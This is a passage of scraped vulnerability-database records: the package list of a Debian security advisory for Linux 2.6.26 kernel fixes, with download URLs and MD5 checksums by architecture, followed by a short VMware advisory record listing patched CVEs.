b08b288693ab9d0d3fa1e8141ba4f038\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 28471478 f412fb78f0dfac51f6e39a035538fe91\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 365312 9147bf190b4dce64fb4783b0c0aba8be\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 364408 66cd6736f72c0eedabbad596baac8888\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 29177668 abb9bcc21a5fcb0a7352a30fb7209ca1\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 3543732 d84be29426f1d706617a6ad91d3b6109\r\n\r\namd64 architecture &#40;AMD x86_64 &#40;AMD64&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 389134 2ac60b6aaece8351c023cecbb4bd41ee\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 749556 c994eeb54dd967b5255448e80fa4911c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 389740 8b6b5b10fe023670ca8cf9326d46ccd0\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 394262 8398b2d9ce752ffa39ac55b8f55fa1b7\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 3719144 1fa20cc556fbfecdf0c2335a3c9edeee\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 106352 edb758613531f5c655c8451f1136b62a\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 106378 dd749481c75a66f517551c6b21b3bbbb\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 19274410 21621e01b880d1f222007e3101d255c6\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 21053742 015990eedbce234dfa4facdf02f6ad60\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 3851500 355a9cc7757195196006160929313e78\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 20902812 3af1d1431ff5674b7aeaf41c784d3ba6\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 3751848 f5289bf2c22a6112d13a9af6d4291226\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 1804900 8ea5afa2f5e29175e92975ef93144b9a\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 106334 2620974dbbc17bbab4aefe183584a6da\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 3774804 8fa1254acec879820c17dd8e2e4eee56\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 20886016 71a1f29b66ee30cf7a63b77cddc71ec7\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb\r\n Size/MD5 checksum: 383280 0d0cad637c14a594b3ae424abf824608\r\n\r\narmel architecture &#40;ARM EABI&#41;\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 365550 f97d5bcae3c5c5957781e6507d730780\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 12396344 04df2ffe832cba3ea1e299701069ca96\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 335184 ff1387cae5afb9c7b2d8b20ab546293f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 4136850 e7e7742e3ead70e194f540432bf93ba6\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 747792 89242eec0e6f453f37b228ddb49e4e26\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 11680082 d9133e003cd603924930f1db870c6d46\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 106354 fce271c39eaa874f6a570b9298a13836\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 9575158 d8c6ec6842339c8d8391916c7b4a25c2\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 11371016 edc9b10b99e73302ef1853db546ed6bb\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 363118 ca61af313ac3687b042c82e4c56bd078\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 106390 d14317d669c70ea8458b0138105be3e0\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-19lenny2_armel.deb\r\n Size/MD5 checksum: 360844 1c7437e1e4de9358f7975feae74501f0\r\n\r\nhppa architecture &#40;HP PA RISC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 17070158 92d872205303ea622d1419d074b54737\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 296434 df3ddd0a0dbfa712201ff031bfc109c0\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 16323830 9998a4deead3033e07f28a1cd0816136\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 297894 8cace7fc519c562d4b8657c75d230815\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 3594236 8d621635c43fb9540d4a68ef6d891a57\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 106356 f967499d62622f5f0833539c9eaf2359\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 106380 f518c1de9ce8dd272db1afa30e38999a\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 15731364 d50829b0556bc7fef6e8c505db959ee2\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 759840 faab7849f3cef86fbebc037cbd00fd76\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 17614856 6311929870350217721f7f194b6ff585\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 299160 57fd97b01842bbe74e37f443e346d695\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-19lenny2_hppa.deb\r\n Size/MD5 checksum: 298110 631076db8957d15ab8b0161a60e31734\r\n\r\ni386 architecture &#40;Intel ia32&#41;\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 398182 6f93bf37534bcfb9162b9985b83ee38f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 20502134 d39255c90c67fddda4c3cb49ce6c93e1\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 20235868 99b3ed110df3b6b2bb6b06feb9d30b72\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 106354 835280ec5ad990b0bcebb988953bd5d9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 20326344 9192cd01f84e7192159aefec2c4f8fb9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 20208578 c118b5d6fc4f5007728d1ab804624cd8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 398052 88be8c6ce0726c87f3127e1ea8b1a382\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 20175038 ee7bf2ce4d4557f9fdfb53790627ebac\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 3719206 0d8393bd6245aa3d23ef8938477d5f63\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 20353680 67f48fcd0835fd230e8583cf2676cf09\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 398494 bf4ef1c3e9f35ec4dc0bfaeda1ee5516\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 3851592 94a16944e91f5594a6fa02115b680434\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 400332 d734fb2f035f0a6a041d13f5a3d95c6c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 749582 26580da1f40ffeeb17146765bbe241f8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 106348 b76709d63441fcc3e285d2a6dc999890\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 20864938 cc5255ece9764242c63b522abfd8a517\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 399328 c929aa19b40e7eea5ea885148c645a17\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 3751908 3b936dbeaf13b730ab8dd56e5ab726f9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 387338 03fd54819fb7176a176eeb4c2ff0209c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 403790 efa7179643f2f709cace01bb3f4a5580\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 3774936 088f38a8e9c79bb4ddc67e200ebee754\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 1591850 93ad5d17c9e8ac22c3544c8a9ad9eabd\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 384698 5cc9137a10772a48628b0014e0dbbc15\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 106404 04d07f928e22a2150a2bb9188c6f1257\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb\r\n Size/MD5 checksum: 18035618 641b34424aad0e9291713bd9e2bf96e5\r\n\r\nia64 architecture &#40;Intel ia64&#41;\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 355640 2bce0c1faefc019460e3eebca333a5fc\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 3654768 d8fb31f9660b7c0ab42c77e89bf82f1f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 355064 cfb3eee78e3860b2e650716d5032bf5d\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 3687386 2980814479dbd08d39bd9f92d3005838\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 355046 62fc734ea7fe9bc4bef1f8d8b65cc027\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 34349456 5cfb3ccf034f0ce13a5861507c4cb758\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 34103026 3cee486177d22e2fcd816b536d7ac3d3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 106350 6265837dd3c0105bcba9d40c5b6966f9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 355698 27152c116ad66c7862f3890d36ac80ab\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 34288678 1540b7be96fbb68e4cc01d858c5ef5a4\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 106384 bfb7eeaec3d89587561c56afec1816e9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 34165098 7a4fbe457d07807a74e9950a47975d49\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_ia64.deb\r\n Size/MD5 checksum: 748220 03f583157c7eef60269042b9a5a6d0bc\r\n\r\npowerpc architecture &#40;PowerPC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 106358 5431bb9d2abe49fc1b186f44bf440cba\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 756032 fb287119a4cf07ef9d6d633ad30f7236\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 372504 9c0501a81bf32b1d0b8c939830d9789b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 23650232 ece0b68e6c9baa2e0f964d2bc7da21a2\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 3856256 5a6eb8c2fe7930456cf5f3a1c257fed1\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 23514630 0aa445df9e479dc6e266a97658c5c675\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 23453120 7fdf0e57cb3324433e8f5d3e71c5cb7c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 23619598 7eb565a76c6ab3318d32c134f7da26b0\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 366586 3e8f8e0d8d9dc83a3e009bbdcca04d21\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 3890668 a75da89a00e2b5118869888ea03580ae\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 373766 78d152d9edb14f5d179dde50a0131ea7\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 366686 4b13a456e727a9259685b74132c5b730\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 106396 33f493756428189d3acc36bde21631ed\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 365950 4149c4f9e6f3e0dc0fbb639a2f962cf8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-19lenny2_powerpc.deb\r\n Size/MD5 checksum: 23216978 b0034a3be5877f2edebf6ec71c70a83e\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: &#96;apt-cache show &lt;pkg&gt;&#39; and http://packages.debian.org/&lt;pkg&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFK8vsShuANDBmkLRkRAuztAKCAAmojb32U5ekaEbI3lWTPLYayHQCfQwhe\r\nvHrSbR3EZNHJzNEAXPK0XqY=\r\n=Synp\r\n-----END PGP SIGNATURE-----", "modified": "2009-11-08T00:00:00", "published": "2009-11-08T00:00:00", "id": "SECURITYVULNS:DOC:22752", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22752", "title": "[SECURITY] [DSA 1927-1] New Linux 2.6.26 packages fix several vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "vmware": [{"lastseen": "2018-09-02T02:40:36", "bulletinFamily": "unix", "description": " \nThe service console package kernel is updated to version 2.4.21-63. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2008-5029, CVE-2008-5300, CVE-2009-1337, CVE-2009-1385, CVE-2009-1895, CVE-2009-2848, CVE-2009-3002, and CVE-2009-3547 to the security issues fixed in kernel-2.4.21-63. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-2698, CVE-2009-2692 to the security issues fixed in kernel-2.4.21-60. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "modified": "2010-06-24T00:00:00", "published": "2010-06-24T00:00:00", "id": "VMSA-2010-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2010-0010.html", "title": "ESX 3.5 third party update for Service Console kernel", "type": "vmware", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}